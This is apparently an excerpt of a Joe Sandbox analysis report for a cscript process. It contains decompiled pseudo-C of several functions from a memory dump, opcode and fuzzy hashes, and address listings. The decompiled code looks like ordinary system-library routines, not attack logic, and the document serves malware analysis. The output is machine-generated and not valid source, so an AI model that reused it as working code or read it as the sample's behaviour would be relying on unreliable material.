Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 04df4a435622b870c296bd582aa6df061e9c736c48e58a5468283af41721f777
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: D251F238A04249BBDB65CB69C180BEEBFB3BF85314F1481EEC84553381C379A989C751

Uniqueness

Uniqueness Score: -1.00%

Function 0558740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0558740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0550D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E054FF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L054D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L054D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E054FF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L054D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0558740d
0x0558740d
0x05587412
0x05587413
0x05587416
0x05587418
0x0558741c
0x0558741f
0x05587422
0x05587422
0x05587428
0x0558742a
0x0558742a
0x05587451
0x05587432
0x0558744f
0x0558744f
0x00000000
0x05587434
0x05587438
0x05587443
0x05587517
0x05587517
0x0558751a
0x05587535
0x05587520
0x05587527
0x0558752c
0x05587531
0x05587533
0x00000000
0x05587533
0x00000000
0x05587531
0x0558754b
0x0558754f
0x0558755c
0x0558755c
0x0558755f
0x05587560
0x05587561
0x05587562
0x05587563
0x05587568
0x0558756a
0x0558756c
0x0558756d
0x0558756d
0x0558756f
0x05587572
0x05587574
0x05587577
0x0558757c
0x0558757f
0x00000000
0x05587551
0x05587551
0x05587551
0x05587553
0x05587553
0x05587449
0x05587449
0x0558744c
0x0558744c
0x00000000
0x0558744c
0x05587443
0x0558750e
0x05587514
0x05587514
0x05587455
0x05587469
0x0558746d
0x00000000
0x05587473
0x05587473
0x05587476
0x05587480
0x05587484
0x0558748e
0x05587493
0x05587493
0x05587496
0x05587499
0x055874a1
0x055874b1
0x055874b5
0x00000000
0x055874bb
0x055874c1
0x055874c1
0x055874c4
0x055874c5
0x055874c6
0x055874c7
0x055874c8
0x055874cd
0x00000000
0x055874d3
0x055874d3
0x055874d6
0x055874d8
0x055874db
0x055874dd
0x055874e0
0x055874e7
0x055874ee
0x055874ee
0x055874f4
0x055874f9
0x00000000
0x055874fb
0x055874fb
0x055874fd
0x05587500
0x05587503
0x05587505
0x05587505
0x055874f9
0x00000000
0x055874cd
0x055874b5
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: a3f97d6f3f1605ada76ced893746871af83f3dff09805664e1fbf07df712a4e0
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: A2517071600606EFCB15DF54C480AA6FBB5FF49304F25C1AAE9099F261E372E949CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 054E2990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E054E2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x558ff00);
				E0550D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x5491664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E054FE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x5491668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E055351BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x549166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E054E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E054C6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E054E2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E054CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E054E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E054E2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E054E2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0550D0D1(_t62);
				goto L28;
			}

0x054e2990
0x054e2992
0x054e2997
0x054e29a3
0x054e29a6
0x054e29ab
0x054e29ad
0x054e29b2
0x05525c80
0x054e29b8
0x054e29b8
0x054e29bb
0x054e29c0
0x054e29c5
0x054e29c6
0x054e29c6
0x054e29cb
0x00000000
0x00000000
0x054e29cd
0x054e29d0
0x054e29d9
0x054e29db
0x054e29dd
0x054e2a7f
0x054e2a84
0x054e2a87
0x054e2a89
0x05525ca1
0x05525ca3
0x00000000
0x054e2a8f
0x054e2a8f
0x00000000
0x054e2a8f
0x00000000
0x054e29e3
0x054e29e3
0x054e29e3
0x00000000
0x054e29e3
0x054e29dd
0x00000000
0x054e29db
0x054e29e6
0x054e29e9
0x054e29eb
0x054e29ed
0x054e29f3
0x054e29f5
0x054e29f8
0x054e29fa
0x054e2a97
0x054e2a9a
0x054e2a9d
0x054e2add
0x00000000
0x054e2a9f
0x054e2aa2
0x054e2aa5
0x054e2aa8
0x054e2aab
0x05525cab
0x05525caf
0x05525cc5
0x05525cda
0x05525cdc
0x05525cdf
0x05525ce5
0x00000000
0x05525ceb
0x05525ced
0x05525cee
0x00000000
0x05525cee
0x05525cb1
0x05525cb4
0x05525cb9
0x05525cbb
0x00000000
0x05525cbd
0x05525cbd
0x00000000
0x05525cbd
0x05525cbb
0x054e2ab1
0x054e2ab1
0x054e2ac4
0x054e2ac6
0x054e2ac6
0x00000000
0x054e2ac6
0x054e2aab
0x00000000
0x054e2a00
0x054e2a09
0x054e2a0e
0x054e2a21
0x054e2a24
0x054e2a35
0x054e2a3a
0x054e2a3d
0x054e2a42
0x054e2a59
0x054e2a59
0x054e2a5c
0x054e2a5f
0x054e2a5f
0x054e29fa
0x054e29f3
0x054e2a64
0x054e2a64
0x054e2a6b
0x054e2a6b
0x054e2a6d
0x054e2a72
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1934c1e011ece3c684ce1addea4ab03e25ace2e3a7f3454f8d7528af9a1a95f0
Instruction ID: 2480d660e6d877c6e198074ecb599a3fcab91015df7d0637f16947847965bfb1
Opcode Fuzzy Hash: 1934c1e011ece3c684ce1addea4ab03e25ace2e3a7f3454f8d7528af9a1a95f0
Instruction Fuzzy Hash: 2F517C75A0421ADFCF25DF55C881AEEBBBABF48310F04805AE815AB360D7B19D52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 054E4D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E054E4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x55ad360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E054FFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x55a7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E054FB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L054D4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E054BCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E054FB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E054FF380(_t67 + 0xc, 0x5495138, 0x10) == 0) {
								 *0x55a60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E054E4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E054E4E70(0x55a86b0, 0x54e5690, 0, 0) != 0) {
					_t46 = E054BCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x054e4d3b
0x054e4d4d
0x054e4d53
0x054e4d58
0x054e4d65
0x054e4d6c
0x054e4d71
0x054e4d77
0x054e4d7f
0x054e4d8c
0x054e4d8e
0x054e4dad
0x054e4db0
0x054e4db7
0x054e4db8
0x054e4db9
0x054e4dba
0x054e4dbb
0x054e4dc1
0x054e4dc8
0x054e4dcc
0x054e4dd5
0x054e4dde
0x054e4ddf
0x054e4de0
0x054e4de1
0x054e4de6
0x054e4de7
0x054e4de9
0x054e4df3
0x00000000
0x00000000
0x05526c7c
0x05526c8a
0x05526c8a
0x05526c9d
0x05526ca7
0x05526cac
0x05526cb2
0x05526cb9
0x00000000
0x05526cbf
0x05526cbf
0x00000000
0x05526cbf
0x05526cb9
0x054e4dfb
0x05526ccf
0x05526cd3
0x054e4e32
0x054e4e39
0x05526ce0
0x05526cf2
0x05526cf2
0x05526ce0
0x054e4e3f
0x054e4e41
0x054e4e51
0x054e4e51
0x054e4e03
0x054e4e03
0x054e4e09
0x054e4e0f
0x054e4e57
0x00000000
0x00000000
0x054e4e1b
0x054e4e30
0x054e4e5b
0x054e4e5b
0x00000000
0x054e4e30
0x054e4e11
0x054e4e11
0x054e4e16
0x00000000
0x054e4e16
0x054e4e01
0x00000000
0x054e4e01
0x054e4da5
0x05526c6b
0x00000000
0x054e4dab
0x054e4dab
0x00000000
0x054e4dab

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb731f588fc692b974b3012f1929182dd66922a3040e292884808833c20c19a8
Instruction ID: 0377b668d2203819f8934249749458f38a87b50fa2676dabe07a5c8ffe1fb74d
Opcode Fuzzy Hash: bb731f588fc692b974b3012f1929182dd66922a3040e292884808833c20c19a8
Instruction Fuzzy Hash: 21416071A40318AFEF21DF19C885FEBB7AAFB45610F04409BE94997280DB74ED44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 054E4BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E054E4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x55ad360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E054BCC50(_t86);
					L11:
					return E054FB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x55a8504
				E054D2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E054FFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E054FB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L054D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E054BCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x55a8504
								E054CFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E054E4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x054e4bad
0x054e4bbf
0x054e4bc2
0x054e4bc6
0x054e4bcd
0x054e4bd9
0x055267fe
0x05526800
0x054e4ccc
0x054e4ccd
0x054e4cb7
0x054e4cc9
0x054e4cc9
0x054e4bdf
0x054e4be5
0x00000000
0x00000000
0x054e4beb
0x054e4bef
0x00000000
0x00000000
0x054e4bf5
0x054e4bf9
0x054e4c06
0x054e4c0b
0x054e4c17
0x054e4c1c
0x054e4c1f
0x054e4c25
0x054e4c33
0x054e4c3d
0x054e4c40
0x054e4c43
0x054e4c47
0x054e4c4d
0x054e4c53
0x054e4c54
0x054e4c55
0x054e4c56
0x054e4c5b
0x054e4c5c
0x054e4c63
0x054e4c6b
0x00000000
0x00000000
0x05526776
0x05526784
0x05526784
0x0552679f
0x055267a7
0x055267af
0x055267ce
0x00000000
0x055267b1
0x055267b7
0x055267b8
0x055267c1
0x055267d3
0x055267d9
0x055267dd
0x054e4c94
0x054e4c94
0x054e4c98
0x054e4c9c
0x054e4ca3
0x055267f4
0x055267f4
0x054e4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x054e4cb5
0x054e4c79
0x054e4c7e
0x054e4c89
0x054e4c8b
0x054e4c8f
0x054e4c8f
0x00000000
0x054e4c89
0x055267c3
0x00000000
0x055267c3
0x055267af
0x054e4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c28217f355d21e016a41a60b44ee78d45bed5a1e997588f23590d01e45a4832e
Instruction ID: 118a12927fdc02f7cc2655d0f68fd2e757c40c5967c3447f621bbfce81e2a659
Opcode Fuzzy Hash: c28217f355d21e016a41a60b44ee78d45bed5a1e997588f23590d01e45a4832e
Instruction Fuzzy Hash: 6241B335A002289BCF20DF69C944FEAB7B5FF45700F0504AAE909AB340DB74DE85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0557AA16, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0557AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0557ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0557AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0557AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0555CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L054D77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E054D7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0557131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0555CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0557aa1f
0x0557aa21
0x0557aa23
0x0557aa2b
0x0557aa30
0x0557aa36
0x0557aa39
0x0557aa42
0x0557aa75
0x0557aa7a
0x0557aa7c
0x0557aa7c
0x0557aa88
0x0557aa8a
0x0557aa8f
0x0557ab02
0x0557ab04
0x0557aa99
0x0557aaa8
0x0557aaaf
0x0557aab3
0x0557aacc
0x0557aad1
0x0557aad6
0x0557aae0
0x0557aaf3
0x0557aaf9
0x0557aafe
0x0557aafe
0x0557aaf3
0x0557aad6
0x0557aab3
0x0557ab07
0x0557ab0a
0x0557ab11
0x0557ab23
0x0557ab13
0x0557ab1c
0x0557ab1c
0x0557ab2b
0x0557ab44
0x0557ab44
0x0557ab51
0x0557ab51
0x0557aa44
0x0557aa47
0x0557aa4c
0x00000000
0x00000000
0x0557aa5a
0x0557aa64
0x0557aa72
0x00000000
0x0557aa66
0x0557aa66
0x0557aa68
0x0557aa6a
0x00000000
0x0557aa6a

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 0dc3789999d36023124bb625bd2ae520ab4935cbb069e6cce6581dfcf493a800
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 4A31D332F006096BDB158B65D855FBFF7ABFF84210F154069E809A7291DA749D00C750

